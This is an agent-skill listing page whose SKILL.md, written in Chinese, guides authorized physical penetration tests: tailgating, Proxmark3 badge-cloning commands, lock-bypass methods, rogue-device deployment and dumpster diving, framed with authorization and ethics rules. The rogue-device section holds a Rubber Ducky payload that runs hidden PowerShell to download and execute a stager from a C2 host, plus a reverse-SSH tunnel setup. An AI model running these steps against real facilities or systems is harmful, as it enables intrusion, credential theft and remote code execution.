performing-physical-intrusion-assessment

通过尾随、门禁卡克隆、锁具绕过和流氓设备部署,执行授权的物理渗透测试,以评估设施安全控制措施的有效性。

9 stars

Best use case

performing-physical-intrusion-assessment is best used when you need a repeatable AI agent workflow instead of a one-off prompt.

通过尾随、门禁卡克隆、锁具绕过和流氓设备部署,执行授权的物理渗透测试,以评估设施安全控制措施的有效性。

Teams using performing-physical-intrusion-assessment should expect a more consistent output, faster repeated execution, less prompt rewriting.

When to use this skill

  • You want a reusable workflow that can be run more than once with consistent structure.

When not to use this skill

  • You only need a quick one-off answer and do not need a reusable workflow.
  • You cannot install or maintain the underlying files, dependencies, or repository context.

Installation

Claude Code / Cursor / Codex

$curl -o ~/.claude/skills/performing-physical-intrusion-assessment/SKILL.md --create-dirs "https://raw.githubusercontent.com/killvxk/cybersecurity-skills-zh/main/skills/performing-physical-intrusion-assessment/SKILL.md"

Manual Installation

  1. Download SKILL.md from GitHub
  2. Place it in .claude/skills/performing-physical-intrusion-assessment/SKILL.md inside your project
  3. Restart your AI agent — it will auto-discover the skill

How performing-physical-intrusion-assessment Compares

Feature / Agentperforming-physical-intrusion-assessmentStandard Approach
Platform SupportNot specifiedLimited / Varies
Context Awareness High Baseline
Installation ComplexityUnknownN/A

Frequently Asked Questions

What does this skill do?

通过尾随、门禁卡克隆、锁具绕过和流氓设备部署,执行授权的物理渗透测试,以评估设施安全控制措施的有效性。

Where can I find the source code?

You can find the source code on GitHub using the link provided at the top of the page.

SKILL.md Source

# 执行物理入侵评估

## 概述

物理入侵评估通过尝试未授权进入设施、服务器机房和受限区域来评估组织的物理安全控制措施。这包括尾随员工、克隆 RFID 门禁卡、绕过锁具、部署流氓网络设备以及测试安保人员程序。物理安全测试是全范围红队演练的关键组成部分,因为它通常提供最直接的网络访问路径。MITRE ATT&CK 将物理访问技术映射至 T1200(硬件添加)和 T1091(通过可移动介质复制)。

## 前置条件

- 已签署授权书(评估期间随身携带)
- 客户安全团队紧急联系方式(24/7)
- 由高管权威签署的"免责信"
- 物理安全测试工具包
- 随身摄像机或记录设备
- 伪装/掩护身份材料(制服、徽章、夹板)

## MITRE ATT&CK 映射

| 技术 ID | 名称 | 战术 |
|---|---|---|
| T1200 | 硬件添加 | 初始访问 |
| T1091 | 通过可移动介质复制 | 初始访问 |
| T1199 | 可信关系 | 初始访问 |
| T1078 | 有效账户 | 初始访问 |

## 物理安全测试工具包

| 工具 | 用途 | 大概费用 |
|---|---|---|
| Proxmark3 RDV4 | RFID 门禁卡克隆(125kHz/13.56MHz) | $300 |
| Flipper Zero | 多协议 RF 分析 | $170 |
| 开锁工具套装(Sparrows) | 机械锁绕过 | $35 |
| 门底工具(UDT) | 从外部绕过门锁 | $30 |
| 撬锁刀 / 插销滑片 | 弹簧锁舌绕过 | $15 |
| LAN Turtle | 流氓网络植入物 | $60 |
| WiFi Pineapple | 流氓无线接入点 | $100 |
| Rubber Ducky / Bash Bunny | USB 按键注入 | $50-80 |
| 夹板 + 安全帽 + 荧光背心 | 社会工程学道具 | $20 |
| 随身摄像机 | 证据记录 | $50 |

## 技术一:尾随

尾随是指跟随授权人员通过安全入口,而不出示凭据。

**方法:**
- **双手占满法**:携带箱子/设备,请求他人帮忙开门
- **吸烟区返回法**:在吸烟区等待,跟随员工返回室内
- **快递员法**:穿着快递制服,携带包裹
- **繁忙入口时机**:在换班或午餐高峰期进入
- **门被撑开**:观察员工是否会撑开门

**需测试的防御措施:**
- 旋转闸门 / 安全气闸
- 安保人员质询程序
- 跟随进入检测系统
- 员工安全意识

## 技术二:门禁卡克隆

```bash
# Proxmark3 - 读取低频(125kHz)HID 卡
proxmark3> lf hid read
# 输出:HID Prox TAG ID: 2006xxxxxx - FC: 123 CN: 45678

# 克隆到 T5577 空白卡
proxmark3> lf hid clone --fc 123 --cn 45678

# 读取高频(13.56MHz)MIFARE 卡
proxmark3> hf mf rdbl --blk 0 -k FFFFFFFFFFFF

# 使用自定义天线进行远距离捕获(最远 3 英尺)
proxmark3> lf hid read  # 使用扩展天线

# Flipper Zero - 读取和模拟
# RFID > 读取 > 将卡靠近 Flipper > 保存 > 模拟
```

**门禁卡克隆攻击流程:**
1. 在门禁读卡器附近定位(电梯、门口)
2. 在员工经过时无线读取徽章(1-3 秒窗口期)
3. 克隆到空白卡
4. 使用克隆卡进入安全区域
5. 记录可访问的区域

## 技术三:锁具绕过

| 锁具类型 | 绕过方法 | 难度 |
|---|---|---|
| 弹子锁(标准) | 撬锁、耙锁或碰撞钥匙 | 易-中 |
| 片状锁(文件柜) | 撬锁或摇动 | 易 |
| 管状锁(自动售货机、服务器) | 管状撬锁工具 | 易 |
| 电子锁(键盘) | 肩窥、热成像摄像机 | 中 |
| 磁力锁(mag lock) | 门底工具、REX 传感器绕过 | 中 |
| 智能锁(蓝牙) | 重放攻击、固件漏洞 | 难 |

```bash
# 电子键盘 - 使用后进行热成像
# 温度较高的按键 = 最近按过的按键
# 在 30 秒内使用 FLIR 摄像机捕获热特征

# REX(请求退出)传感器绕过
# 插入细线或使用压缩空气罐触发
# 磁力门锁内侧的运动传感器
```

## 技术四:流氓设备部署

```bash
# LAN Turtle - 插入暴露的以太网端口
# 通过 SSH 反向隧道连回 C2 服务器
# 自动配置为中间人

# 配置 LAN Turtle 进行反向 SSH
# 模块:AutoSSH
# 主机:c2.redteam.com
# 端口:22
# 远程端口:2222

# WiFi Pineapple - 部署在公共区域
# 通过邪恶双胞胎攻击捕获无线凭据
# 通过蜂窝调制解调器泄露数据

# USB Rubber Ducky - 丢在停车场或放在桌上
# 载荷:下载并执行 C2 代理
# Duckyscript:
# DELAY 1000
# GUI r
# DELAY 500
# STRING powershell -w hidden -c "IEX(New-Object Net.WebClient).DownloadString('https://c2.redteam.com/stager.ps1')"
# ENTER
```

## 技术五:垃圾搜索

在外部废物容器和回收箱中搜索:
- 含敏感信息的打印文件
- 员工名录和组织架构图
- 网络图和 IP 地址
- 碎纸(评估交叉切碎与条状切碎)
- 废弃硬件(硬盘、USB 驱动器)

## 评估方法

### 评估前侦察
1. 周边巡查 - 识别所有入口、摄像头、哨岗
2. 观察员工规律 - 换班时间、休息时间表
3. 识别门禁技术(HID、MIFARE、iCLASS)
4. 映射摄像头覆盖范围和盲区
5. 记录安保人员巡逻路线和时间

### 执行阶段
1. **外部周边**:围栏、大门、停车障碍
2. **建筑入口**:主入口、侧门、装卸码头
3. **内部访问**:楼层访问、电梯控制
4. **受限区域**:服务器机房、行政办公室、数据中心
5. **设备部署**:网络植入物、流氓无线设备

### 记录要求
- 每次访问尝试的时间戳和位置
- 成功进入的照片/视频
- 接受克隆凭据的门禁读卡器位置
- 未锁门、被撑开的门、尾随机会
- 公共区域可访问的网络端口
- 废物容器中的数据证据

## 道德与安全注意事项

1. **始终携带授权书** - 遇到质询时随时准备表明身份
2. **切勿强行进入** - 如果技术会损坏财产,记录并跳过
3. 在冲突解除前如有执法人员介入则**立即停止**
4. **未经授权不得拍摄个人**
5. **记录,不要利用** - 拍照作为证据,不要窃取实际数据
6. **安全第一** - 不要进入危险区域或绕过消防安全措施

## 参考资料

- ISACA 物理渗透测试白皮书(2023)
- ASIS 物理安全专业人员(PSP)指南
- NIST SP 800-116 Rev. 1:智能卡 PIV 指南
- Deviant Ollam - 物理安全评估方法论
- MITRE ATT&CK T1200: https://attack.mitre.org/techniques/T1200/

Related Skills

performing-yara-rule-development-for-detection

9
from killvxk/cybersecurity-skills-zh

通过识别可执行文件中的唯一字节模式、字符串和行为指标,开发精准的 YARA 恶意软件检测规则,同时将误报率降至最低。

performing-wireless-security-assessment-with-kismet

9
from killvxk/cybersecurity-skills-zh

使用 Kismet 通过被动射频监控进行无线网络安全评估,检测流氓接入点(Rogue AP)、隐藏 SSID、弱加密和未授权客户端。

performing-wireless-network-penetration-test

9
from killvxk/cybersecurity-skills-zh

执行无线网络渗透测试,通过捕获握手包、破解 WPA2/WPA3 密钥、检测流氓接入点以及使用 Aircrack-ng 和相关工具测试无线网络分段,评估 WiFi 安全性。

performing-windows-artifact-analysis-with-eric-zimmerman-tools

9
from killvxk/cybersecurity-skills-zh

使用 Eric Zimmerman 的开源 EZ Tools 套件(包括 KAPE、MFTECmd、PECmd、LECmd、JLECmd 和 Timeline Explorer)执行全面的 Windows 取证制品分析,解析注册表 hive、预取文件、事件日志和文件系统元数据。

performing-wifi-password-cracking-with-aircrack

9
from killvxk/cybersecurity-skills-zh

在授权无线安全评估中捕获 WPA/WPA2 握手包,并使用 aircrack-ng、hashcat 和字典攻击进行离线密码破解, 以评估密码短语强度和无线网络安全状况。

performing-web-cache-poisoning-attack

9
from killvxk/cybersecurity-skills-zh

在授权安全测试期间,通过未纳入缓存键的头部和参数毒化缓存响应,利用 Web 缓存机制向其他用户投递恶意内容。

performing-web-cache-deception-attack

9
from killvxk/cybersecurity-skills-zh

通过利用 CDN 缓存层与源服务器之间的路径规范化差异,执行 Web 缓存欺骗攻击,从而缓存并获取敏感的已认证内容。

performing-web-application-vulnerability-triage

9
from killvxk/cybersecurity-skills-zh

使用 OWASP 风险评级方法论对 DAST/SAST 扫描器的 Web 应用程序漏洞发现进行分类,区分真阳性和假阳性,并确定修复优先级。

performing-web-application-scanning-with-nikto

9
from killvxk/cybersecurity-skills-zh

Nikto 是一款开源 Web 服务器和 Web 应用程序扫描器,可针对超过 7,000 个潜在危险文件/程序进行测试,检查超过 1,250 个服务器的过期版本,并识别超过 270 个服务器的版本特定问题。

performing-web-application-penetration-test

9
from killvxk/cybersecurity-skills-zh

遵循 OWASP Web 安全测试指南(WSTG)方法论,对 Web 应用程序执行系统化安全测试,识别认证、授权、 输入验证、会话管理和业务逻辑中的漏洞。测试人员以 Burp Suite 作为主要拦截代理,结合手动测试技术 发现自动化扫描器遗漏的缺陷。适用于 Web 应用渗透测试、OWASP 测试、应用安全评估或 Web 漏洞测试等请求场景。

performing-web-application-firewall-bypass

9
from killvxk/cybersecurity-skills-zh

使用编码技术、HTTP 方法操控、参数污染和载荷混淆绕过 Web 应用防火墙保护,将 SQL 注入、XSS 及其他攻击载荷穿透 WAF 检测规则。

performing-vulnerability-scanning-with-nessus

9
from killvxk/cybersecurity-skills-zh

使用 Tenable Nessus 执行认证和未认证漏洞扫描,识别网络基础设施、服务器和应用程序中的已知漏洞、 错误配置、默认凭据和缺失补丁。扫描器将发现与 CVE 数据库和 CVSS 评分关联,生成优先级修复指导。 适用于漏洞扫描、Nessus 评估、补丁合规检查或自动化漏洞检测等请求场景。